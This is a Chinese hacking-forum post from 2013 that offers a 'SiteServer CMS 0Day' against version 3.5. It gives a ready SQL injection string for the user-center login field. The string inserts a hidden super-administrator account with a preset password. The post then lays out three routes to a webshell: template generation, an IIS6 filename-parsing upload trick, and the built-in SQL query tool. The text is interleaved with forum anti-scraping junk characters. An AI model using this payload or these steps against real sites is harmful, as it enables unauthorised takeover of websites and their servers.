找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2215|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
& L) P2 r: V2 {4 c
3 Q* [/ B; v, A, Z4 g# M# Wstieserver官网:www.siteserver.cn9 F. ^8 b0 w" m1 C/ p9 g3 V* X0 ?: Q

; I+ x4 P4 ^3 w6 q" x4 ]# Z. I& q' q
8 I+ ~: ]  D0 H( D
+ Q% J, k, r' l; TEXP:$ Y( V) J: C( U

# f, d1 L. @/ z) ]7 Y直接访问UserCenter/login.aspx
) j: Z0 _" F; I( Z7 w  A# ^6 D9 R; r# a, P: W
0 G! p# c; V+ Q" O% m7 C

# N8 f$ X+ d: \! e用户名处输入:6 J. b( o' K" c6 F5 |

4 g- S9 P7 @& J2 [# v123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
* W2 W6 u  v0 g' _  \5 E5 w2 s% P1 x! {/ T% o

7 s2 a( T5 L; @$ o; ?3 u& e) L" O' f
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
/ z3 J+ j' h) y6 c- n5 u8 s& C4 q3 X
9 \2 P) \& O. z$ y. h' ?6 \

% X& q3 n, D% ^之后再访问后台SiteServer/login.aspx用插入的用户登陆
4 [5 x; ~( l. V/ ~( B5 b  S1 I# S
" F: T7 K. y3 s/ j. J! ^0 w( p. o
" W! Y# J  Y: F, m/ O
, Y4 F. [9 c. S" R( W% C. Z2 L7 i后台拿webshell的三种方法:/ k( s; B' ]2 Y/ J, w
2 \* k4 N& R1 m4 l9 ?: Y# }* l
一、, ]+ A/ E) _* f2 |/ y: @; a0 Z2 {

5 x, l* f# p; v% n) \; c3 }站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
1 \* W* N! E; P- E. N+ R) x. E; F8 x' v. J% ?3 S+ ~2 }9 _: d
二、7 A/ l4 q; n% W8 F7 U' v# c

7 e! \* }- `: Q  c8 r% P$ a: ^成员权限-》添加用户-》用户名为:1.asp$ a" O/ G2 S, w' K4 a3 D7 g. D" c

& \9 D4 i* A& c* [/ I% Zhttp://127.0.0.1/usercenter/- i% s0 I9 ~3 ^# b( s$ ?# Y

% [! a- @3 }4 U/ j9 c: o用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell3 t* i! Y- }9 e' Z7 K  |
0 |% l9 J2 D8 H( Q, |  G3 m" m* f
(ps:后台添加用户时不会验证是否含有非法字符)% x1 @6 }$ h* I+ m+ |4 Q

' ^; N- O3 g4 l& l三、" W: b. G' {/ X" s1 v4 M* X
5 @8 i, }' [( L# `" J- F  ~* H
系统工具-》实用工具-》机器参数查看
8 u* e  Y4 u4 E" O7 b* L7 S- Q, W可以看到数据库类型、名称,WEB路径
% U  y' C7 d' @  t  S; u1 z5 v& `& V: x% R  N( v, J5 P
系统工具-》数据库工具-》SQL语句查询
* J' \, a2 H1 V1 O这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。3 s' _$ x2 G2 C9 e2 X+ ]" r

( Q& \3 r7 ?/ J% E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表